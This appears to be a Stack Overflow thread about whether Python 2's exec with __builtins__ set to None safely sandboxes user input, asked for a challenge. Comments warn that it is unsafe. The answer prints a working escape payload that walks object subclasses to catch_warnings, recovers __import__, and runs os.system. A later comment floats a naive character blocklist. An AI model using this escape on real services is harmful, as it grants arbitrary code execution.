Is an `exec("string", {'builtins': None})` a secure way to execute user input? If not, how can it be maliciously leveraged

Question

If this is being executed and I have full control over the string's value, am I able to leverage a reverse shell or am I able to read files.

exec("string", {'__builtins__': None})

I'm having issues with finding relevant documentation about what is not included __builtins__. I've manually found that print('something') works.

I, myself, lack the knowledge to determine whether this is exploitable or not. I feel like something like this shouldn't be safe since, correct me if I'm wrong, all builtins are python functions (Not confident on this).

I thought it might also be relevant referencing that a global variable was given as the 3rd argument. i.e: exec("string", {'__builtins__': None}, global_var)

Note: This is for python2. Note: This is for a challenge. No grey/black hat stuff!

I think it depends a bit on what you mean by exploitable -- but the answer is probably "yes -- on some level this is unsafe". See https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html where it is demonstrated that a malicious user could effectively segfault your interpreter under these circumstances. — mgilson, Dec 25 '19 at 22:25
Moreover, that's a segfault because the bytecode being run is `KABOOM`, but if someone can run any arbitrary bytecode they want, that's a lot of attack surface to use to find an arbitrary code execution mechanism. Just because an exploit isn't known yet doesn't mean it's wise to expose the surface. — Charles Duffy, Dec 25 '19 at 22:31

score 1 · Answer 1 · answered Dec 26 '19 at 17:54

This is not a safe practice. Code exec can happen in the following manner:

This example executes some shellcode by importing os. The following can be altered to gain access to all builtins.

s = "[c for c in ().__class__.__base__.__subclasses__() if c.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('shellcode')"
exec(s, {'builtins': None})

The articles mentioned in the comments on the main question provide all the resources I used to get to this conclusion. Thanks guys!

if i dont allow `_` , \ , `dir` will this be safe – Santhosh Dec 13 '20 at 03:32 — Santhosh, Dec 13 '20 at 03:32

Is an `exec("string", {'__builtins__': None})` a secure way to execute user input? If not, how can it be maliciously leveraged

1 Answers1

Is an `exec("string", {'builtins': None})` a secure way to execute user input? If not, how can it be maliciously leveraged